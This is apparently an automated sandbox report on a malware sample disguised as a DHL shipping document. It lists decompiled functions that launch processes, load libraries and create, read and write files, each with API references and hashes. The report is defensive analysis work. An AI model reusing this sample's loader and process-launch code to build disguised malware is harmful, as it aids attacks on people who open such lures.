                                                              0x004013bd
                                                              0x004013be
                                                              0x004013c0
                                                              0x004013c2
                                                              0x004013b9
                                                              0x004013b9
                                                              0x004013ba
                                                              0x004013ba
                                                              0x004013c9
                                                              0x004013cb
                                                              0x004013f4
                                                              0x004013f4
                                                              0x004013c9
                                                              0x00000000

                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                              • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                              • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                              • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                              0x00405c54
                                                              0x00405c74
                                                              0x00405c7c
                                                              0x00405c81
                                                              0x00000000
                                                              0x00405c87
                                                              0x00405c8b

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID:
                                                              • API String ID: 3712363035-0
                                                              • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                              • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                              • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                              • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                              0x00406a3d
                                                              0x00406a40
                                                              0x00406a47
                                                              0x00406a4f
                                                              0x00406a5b
                                                              0x00000000
                                                              0x00406a62
                                                              0x00406a52
                                                              0x00406a59
                                                              0x00000000
                                                              0x00406a6a
                                                              0x00000000

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                              • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                              • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                              • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 68%
                                                              			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                              0x0040615c
                                                              0x00406169
                                                              0x0040617e
                                                              0x00406184

                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe,80000000,00000003), ref: 0040615C
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                              0x00406138
                                                              0x0040613e
                                                              0x00406143
                                                              0x0040614c
                                                              0x0040614c
                                                              0x00406155

                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                              • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                              • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                              0x00405c1c
                                                              0x00405c24
                                                              0x00000000
                                                              0x00405c2a
                                                              0x00000000

                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                              • GetLastError.KERNEL32 ref: 00405C2A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                              • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                              • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                              0x0040620e
                                                              0x0040621e
                                                              0x00406226
                                                              0x00000000
                                                              0x0040622d
                                                              0x00000000
                                                              0x0040622f

                                                              APIs
                                                              • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040F0CA,0040CEF0,00403579,0040CEF0,0040F0CA,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                              • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                              • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                              0x004061df
                                                              0x004061ef
                                                              0x004061f7
                                                              0x00000000
                                                              0x004061fe
                                                              0x00000000
                                                              0x00406200

                                                              APIs
                                                              • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                              • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                              • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                              0x00403606
                                                              0x0040360c

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 78%
                                                              			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                              0x00401faa
                                                              0x00401faf
                                                              0x00401fb5
                                                              0x00401fba
                                                              0x00401fbe
                                                              0x0040292e
                                                              0x00401fc4
                                                              0x00401fc7
                                                              0x00401fca
                                                              0x00401fd2
                                                              0x00401fe1
                                                              0x00401fe3
                                                              0x00401fe3
                                                              0x00401fd4
                                                              0x00401fd8
                                                              0x00401fd8
                                                              0x00401fd2
                                                              0x00401fea
                                                              0x00401feb
                                                              0x00401feb
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                                • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
